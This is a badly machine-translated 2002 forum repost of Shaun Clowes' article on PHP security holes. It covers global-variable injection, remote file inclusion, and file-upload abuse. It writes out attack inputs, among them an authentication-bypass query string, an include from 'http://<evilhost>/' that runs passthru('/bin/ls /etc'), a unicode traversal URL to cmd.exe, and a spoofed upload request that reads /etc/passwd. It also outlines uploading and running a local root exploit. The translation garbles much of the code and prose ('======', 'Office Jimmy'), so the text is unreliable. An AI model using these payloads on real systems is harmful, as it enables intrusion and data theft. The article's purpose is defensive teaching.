[] How to reproduce a common procedure to attack the loopholes in PHP (1)

Leehoo authors of the letter : (A-), PHP letter : Title : How to attack the loopholes in the Common procedures PHP (1) Wuhan : Baiyun Flavor Point Station letter (November 30, 2002 18:50:19 Saturday), the letter points Common procedures on how to attack the loopholes in PHP (1) Translation : analysist (analysts) Source : http://www.china4lert.org Common procedures on how to attack the loopholes in PHP (1) Clowes : Mr. Shaun original "http://www.securereality.com.au/> Translation : analysist "http://www.nsfocus.com/> Has translated this article is that, because the articles are on Canal Perl CGI security as an example, and specifically referred to Shao ASP, PHP or JSP safety of the articles has been very small. Mr. Shaun Clowes This article introduces a more comprehensive PH P safety, in the language can be found in http://www.securereality.com.au/studyinscarlet.txt 。 As long text, but a considerable portion of the article is to introduce the basic knowledge of the background or PHP not involve PH P safe area, therefore I do not have to translate. If you want to understand the knowledge, please refer to the original. This article from the overall variables, remote documents to documents, the Secretary document Session documents, data types and easy to make Fault analysis of the function of several aspects of the PHP Security, and on how to enhance the safety made a number of useful PHP Proposal. Well, nonsense little, we have to get down to business again! [Global Variables] PHP variables do not need to state that they will automatically create the first use, they do not need to refer to the type , They will be automatically environmental context. From a programmer's point of view, this is an extremely convenient Approach. Clearly, this is a very rapid development of the language features. Once a variable was created , It can be used in any proceedings. The result is that programmers rarely feature of this variable initialization. After all, when they first established, they are empty. It is clear that the main function of PHP-based applications are generally accepted user input (mainly Form variables available Documents and Cookie), and then to input data, then return the results to the client browser. To PHP code so that users visit the importation easy as possible, in fact these are PHP variable input data as a whole to Office Jimmy's. For example : "FORM METHOD=" GET "ACTION=" test.php "" "INPUT TYPE=" TEXT "NAME=" Panorama "" "INPUT TYPE=" SUBMIT "" "/FORM> Obviously, it will show a text box and submit button. When the user hits submit button, the "test.php" Council Office Jimmy user input, "test.php" operation, "$hello" will be included in the text box users input data. From here we should see that the attacker can create arbitrary according to their own desires and the overall variables. If not attack Form is to be deployed for the importation of "test.php", but directly in the browser address input column http://server/tes T.php?hello=hi&setup=no, then more than a "$hello" has been established, "$setup" has been created. Translator's Note : This method is what we usually call the "POST" and "GET" approach. Now the PHP user authentication code exposed as a result of the overall safety of variables : "?php If ($pass ====== "Panorama") $auth = 1; ... If ($auth ====== 1) Echo "some important information"; ?> The above code first checks whether the user's password for the "Panorama" If matched, the installation of "$auth" to "1 , "That is, through authentication. If after "$suth" to "1", it will indicate some important information. Appeared to be correct, and we have a considerable number of people are doing, but this code of wanted criminals However mistake, it assumed that "$auth" time value is not provided in the air and do not attack can create permanent He variables and the overall valuation, a similar "http://server/test.php?auth=1" approach, we can This code by deception, we believe it has been certified before. Therefore, in order to increase the safety procedures PHP, we can not believe that the absence of a clear definition of variables. If procedures Many of the variables, and this is a very arduous task. Is a commonly used methods of inspection or POST_VARS[] HTTP_GET[] array of variables, which we depend on the Submission (GET or POST). When opened for the distribution of PHP "track_vars" the option (which is the default value). Users can be variable in the overall array variables and the above-mentioned gain. But worthy of note is that the PHP array variables used to deal with four different user input. HTTP_GET_VARS few GET Group ways to deal with the variables used to handle POST submission HTTP_POST_VARS array of variables, HT TP_COOKIE_VARS array processing as a cookie for the first variable, but for HTTP_POST_FILES array ( Only relatively new PHP), it is entirely user to submit an alternative way of variables. A user can request It is very easy to put four array variables exist, it is a safe procedure to examine four PHP array. [Remote] PHP is a language rich properties with a lot of functions, for achieving a certain functional programming is easy. But From the security point of view, the more functions to ensure the safety of the more difficult, long-range document is to explain this question That's a good example : "?php If (! ($fd = Fopen ( "$filename", "r")) Echo ( "Could not open file : $filename \n "); ?> Above the script attempts to open the document "$filename" If it fails, it shows the wrong message. Obviously, if we To designate "$filename", the system will be able to use this script to visit any documents. However, the foot There is also a less tangible characteristics of this, it can be read from any other point of FTP or Web documents. Real , The majority of document processing function for PHP Remote document processing is transparent. For example : If the designated "$filename" to "http://target/scripts/. . %c1%1c. . /winnt/system32/cmd. Exe?/c+dir " It is actually using the above code on the target server unicode loopholes in the implementation of the order of 9-12. This has to support remote documents include () and require () and include_once () and require_once () in Below environment becomes even more interesting. These designated function main function is to contain the contents of the documents, as well as to incorporate them in accordance with PHP Code explained that the document is mainly used in the reservoir. For example : "?php Include ($libdir. "/languages.php"); ?> On the cases "$libdir" is a good set up before the implementation of the road code, if the attacker can make " $libdir "Has not been installed, then he can change this path. However, the attackers did not do anything Because they could only visit in their designated path languages.php document (the perl "Poison null Byte "no role in attacks on PHP). With the support of the document, however remote, the attacker can do anything Intelligence. For example, an attack can last up to a certain server languages.php a document that includes the following elements : "?php Passthru ( "/bin/ls /etc"); ?> Then "$libdir" set up "http://<evilhost>/" so that we can implement the objectives of the mainframe The above code attacks, "/etc" list as a result of the return to the client's browser China. Attention is the need to attack the server (ie evilhost) can be implemented PHP code, or code will attack Attacks in the server, instead of the server implementation, if you want to know the specific technical details, please refer to : http : //www.securereality.com.au/sradv00006.txt [File Upload] PHP File Upload automatic support for RFC 1867, we see the following examples : "FORM METHOD=" POST "ENCTYPE=" multipart/form-data "" "INPUT TYPE=" FILE "NAME=" Panorama "" "INPUT TYPE=" HIDDEN "NAME=" MAX_FILE_SIZE "VALUE=" 10240 "" "INPUT TYPE=" SUBMIT "" "/FORM> The above codes enable users to select a document from the local machine, click the submission, the document will be available on the server . This is obviously a very useful function, but this method of the response function of PHP variable insecurity. When the first then PHP To such a request, even in the beginning it was calling the PHP code analysis before it will accept the remote user documents seized Exceed the length of the investigation "$MAX_FILE_SIZE variable definition of" value, if we pass these tests, then , The local paper there will be a temporary directory. Therefore, the attacker can send any document to the mainframe running PHP, PHP procedures had not yet decided whether to accept documents Available, the document has been there on the server. I am not here to discuss the use of the server for file uploading to the possibility of a DOS attack. Let us consider the PHP File Upload handling procedures, as we just said, the documents were received and services exist Devices (location is specified in the configuration file, usually /tmp), the expansion of the general random, similar to the "phpxX UoXG "form. PHP documents containing information on the procedures necessary to deal with it, which can be adopted in two ways -- one side Type 3 is already in use in PHP, and the other is in our previous method for the introduction of the safety notice. However, we can say with certainty that the problem still exists, the majority of PHP or procedures on the use of the old ways to handle Contains documents. PHP variables to describe the whole set up four available documents, such as the above examples : $hello = Filename on local machine (eg "/tmp/phpxXuoXG") $hello_size = Size in bytes of file (eg 1024) $hello_name = The original name of the file on the remote system (eg "C:\\temp\\hello.txt") $hello_type = Mime type of uploaded file (eg "text/plain") PHP then start processing procedures under the "$hello" designated document, the problem is "$hello" is not a PH P set up variables that any remote user can designate it. If we use the following methods : Http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/p Lain&hello_name=hello.txt PHP overall lead on the following variables (ex-POST method can be (even Cookie)) : $hello = "/etc/passwd" $hello_size = 10240 $hello_type = "Text/plain" $hello_name = "Hello.txt" Form data in the above procedures are fulfilling expectations PHP variables, but this time no longer handling procedures contained in the text of PHP Pieces, but with the "/etc/passwd" (usually exposed lead content). Such attacks can be used to expose any min Sense of the content of the document. I have said earlier that the new version of the document containing the decision to HTTP_POST_FILES[] use PHP, also provided Many functions to solve this problem, for instance, a function used to judge whether a particular document is not actually contained in the documents . These function satisfactorily resolved the issue, but in fact I am sure many still use the old procedure PHP, Very vulnerable to such attacks. File Upload as a variety of attack methods, we see the following section of code : "?php If (file_exists ($theme)) 4003rd Checks the file exists on the local system (no Remote files) Include ( "$theme"); ?> If the attacker can control "$theme", it is clear that it can use the "$theme" remote reading system Any document. The ultimate objective is to attack remote server implementation arbitrary orders, but he was unable to use long-distance Documents, and that he must work to create a remote server PHP documents. At first glance it seems impossible. And then create an inclusive entitled "theme" of the document domain Form, Form is used by the File Upload regard innovation PHP includes built-in the paper submitted to the above code, PHP will submit the document to preserve attack, and "$theme" The value of the documents submitted were set up for the attack, file_exists () function checks to attack The code will also be implemented. The ability to carry out any orders, the attackers apparently want to improve or expand the authority of results, which in turn needs a Some servers without the tool, and file uploading again helped us out. The attacker can use paper Zones available tools, they exist on the server, then the ability to use them in order to use chmod () to Change the authority document, and then implementation. For example : The attacker can bypass the firewall or IDS are on the way to attack a local root Sequence, and then implementation, and this was root权限. "To be continued" -- Source : Wuhan activity Baiyun Flavor Station bbs.whnet.edu.cn [FROM feet working group] :